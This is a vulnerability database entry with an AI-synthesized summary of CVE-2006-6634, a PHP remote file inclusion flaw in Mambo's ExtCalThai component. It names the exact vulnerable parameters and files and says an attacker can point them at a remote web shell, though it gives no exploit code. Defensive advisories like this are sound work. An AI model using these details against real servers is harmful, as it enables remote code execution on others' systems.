CVE-2006-6634
Description
PHP remote file inclusion in Mambo's ExtCalThai component allows arbitrary code execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PHP remote file inclusion in Mambo's ExtCalThai component allows arbitrary code execution.
Vulnerability
Multiple PHP remote file inclusion vulnerabilities exist in the ExtCalThai component for Mambo, versions 0.9.1 and earlier. Attackers can exploit these by providing a crafted URL in specific parameters, such as CONFIG_EXT[LANGUAGES_DIR] in admin_events.php, mosConfig_absolute_path in extcalendar.php, or CONFIG_EXT[LIB_DIR] in lib/mail.inc.php [1].
Exploitation
An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable component. The attacker needs to control the value of one of the vulnerable parameters, such as CONFIG_EXT[LANGUAGES_DIR], and point it to a remote file that they control, for example, a web shell disguised as an image file [1].
Impact
Successful exploitation of these vulnerabilities allows a remote attacker to execute arbitrary PHP code on the server. This can lead to a compromise of the application and potentially the underlying system, with the attacker gaining the privileges of the web server process.
Mitigation
ExtCalThai versions 0.9.1 and prior are affected. No specific patched version or release date is available in the provided references. It is recommended to remove or disable the ExtCalThai component if it is not actively maintained or updated. Other versions may also be affected [1].
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: <=0.9.1
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
4News mentions
0No linked articles in our index yet.